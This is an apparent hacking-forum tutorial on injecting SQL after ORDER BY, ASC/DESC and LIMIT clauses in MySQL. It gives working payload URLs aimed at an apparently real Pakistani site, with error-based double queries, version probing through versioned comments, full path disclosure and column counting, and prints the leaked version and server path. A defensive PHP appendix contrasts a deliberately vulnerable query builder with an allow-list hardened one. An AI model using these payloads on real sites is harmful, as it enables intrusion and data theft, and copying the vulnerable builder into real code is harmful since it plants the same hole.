
Bypass 'Incorrect usage of UNION and ORDER BY'

this tut will give you instructions on how to inject after order by/limit.

like that

PHP Code:

SELECT  *  FROM page WHERE id = 1 ORDER BY id  [ here ]  ASC  [ here ]  LIMIT 10 , 10  [ here ] 

here - injection point. we can't use union after those clauses, so we're going to play with the other things we can do.

after order by id [here] - using double query. if we have this site

Code:

http://HdhCmsTest2cto测试数据 /include/products.php?sb=id

the injection point is after order by. i know i can use union in another injection point, i do it for the tut. after order by it's simple, the only things we can't use are union, having, where, and some more things that don't matter. we can use 'and' for the double query.

Code:

http://HdhCmsTestteletec测试数据.pk/include/products.php?sb=id and (select count(*) from products group by concat(version(),0x27202020,floor(rand(0)*2-1)))--

'5.0.95-community' (i used the table 'products' because i can see from the error that this table exists. if you can't see the table, use 'information_schema.columns'.)

after desc/asc [here] - using double query. if we have this site

Code:

http://HdhCmsTestteletec测试数据.pk/include/products.php?sb=id desc'

the injection point is after desc. after desc/asc it's a little more of a problem, because we can't use union, having, where, and, or, xor, *, >, so we can't execute our query directly. so we add a comma, and the double query after that.

Code:

http://HdhCmsTestteletec测试数据.pk/include/products.php?sb=id desc,(select count(*) from users group by concat(version(),0x27202020,floor(rand(0)*2-1)))

'5.0.95-community'

note - if the injection point is like that-

PHP Code:

SELECT  *  FROM page WHERE id = 1 ORDER BY  [ here ]  id 

just add '1' and inject like in the first example.

Code:

1 and (select count(*) from products group by concat(version(),0x27202020,floor(rand(0)*2-1)))--

after limit 10,10 [here] - using some tricks. like this site-

injection point after limit clause. when the injection point is after the limit clause we can't do much; the only things that still work are offset, into, into outfile/dumpfile, /*!*/, for update, lock in share mode. so we try to exploit what we can.

toc- get the version, full path disclosure, find column count

get the version (thanks to lolalu0)

we can use comments for getting the mysql version. we can guess it, and if the guess is true the page will not load, just like blind, but different.

Code:

http://HdhCmsTest2cto测试数据 /include/products.php?rw=10 /*!50094aaaa*/

page doesn't load - version is 5.00.94 or higher

Code:

http://HdhCmsTestteletec测试数据.pk/include/products.php?rw=10 /*!50096aaaa*/

page loads normally - version is smaller than 5.00.96

Code:

http://HdhCmsTestteletec测试数据.pk/include/products.php?rw=10 /*!50095aaaa*/

page doesn't load - version is 5.00.95.

FPD - Full Path Disclosure. we can put 0 or /**/ in the limit clause, and an error with the full path will appear, even when mysql_error is on. for example

final query-

PHP Code:

select  *  from .... limit 0 , 0 

and we can also

Code:

Warning: Division by zero in /home/teletec/public_html/include/products.php on line 164

find the column count using into. it will not really help, but it's a nice trick. if we have this site-

injection point is after limit. we can count the columns like that-

Code:

http://HdhCmsTestteletec测试数据.pk/include/products.php?rw=10 into @

error 1222. not 1 column.

Code:

http://HdhCmsTestteletec测试数据.pk/include/products.php?rw=10 into @,@

error 1222. not 2 columns. and so on until-

Code:

http://HdhCmsTestteletec测试数据.pk/include/products.php?rw=10 into @,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@

error 1172 "Result consisted of more than one row". 60 columns. hope you learned something

Author: JUST FUCK IT!
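For the defender's side, here is an added example (not code from the original post) of the PHP pattern that produces injection points like the ones above, with the `sb` sort column and `rw` row offset pasted straight into ORDER BY and LIMIT, beside a hardened version that resolves them through an allow-list and an integer cast. The `products` table, its columns and the `dir` parameter are assumptions.

```php
<?php
// Added example, not code from the original post. Assumed schema: table `products` with
// columns id, name, price; request parameters `sb` (sort column), `dir` (direction) and
// `rw` (row offset), matching the products.php?sb=...&rw=... pattern the post describes.

// VULNERABLE: `sb` and `rw` are pasted into ORDER BY / LIMIT as raw text. Nothing stops a
// request such as sb=id desc,(select ...) or rw=10 into @ from becoming part of the query,
// which is exactly why no placeholder after those clauses protects the application.
function products_query_vulnerable(array $get): string
{
    $sb = $get['sb'] ?? 'id';
    $rw = $get['rw'] ?? '0';
    return "SELECT * FROM products ORDER BY $sb ASC LIMIT $rw, 10";
}

// HARDENED: identifiers and the sort direction cannot be bound as parameters, so they are
// resolved through a fixed allow-list; the offset is validated as a non-negative integer and
// bound with PDO::PARAM_INT. Any unexpected `sb` value (including "id desc,...") falls back
// to the default column instead of ever reaching the SQL text.
function products_query_hardened(array $get, PDO $pdo): PDOStatement
{
    $columns = ['id' => 'id', 'name' => 'name', 'price' => 'price'];
    $sbReq   = is_string($get['sb'] ?? null) ? $get['sb'] : 'id';
    $sb      = $columns[$sbReq] ?? 'id';
    $dir     = (($get['dir'] ?? 'asc') === 'desc') ? 'DESC' : 'ASC';
    $rw      = filter_var($get['rw'] ?? 0, FILTER_VALIDATE_INT, ['options' => ['min_range' => 0]]);
    if ($rw === false) {
        $rw = 0;
    }
    // LIMIT accepts a bound integer; with emulated prepares PDO::PARAM_INT keeps it unquoted.
    $stmt = $pdo->prepare("SELECT * FROM products ORDER BY `$sb` $dir LIMIT :off, 10");
    $stmt->bindValue(':off', $rw, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt;
}

// Show what the vulnerable builder emits for a request shaped like the post's payloads
// (constructed probe values). The hardened builder would run "ORDER BY `id` ASC" instead.
$probe = ['sb' => 'id desc,(select 1)', 'rw' => '10 into @'];
echo products_query_vulnerable($probe), PHP_EOL;
```

Logging requests whose `sb` value is not in the allow-list, or whose `rw` value fails the integer check, gives a cheap detection signal for exactly the probing shown in this post.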
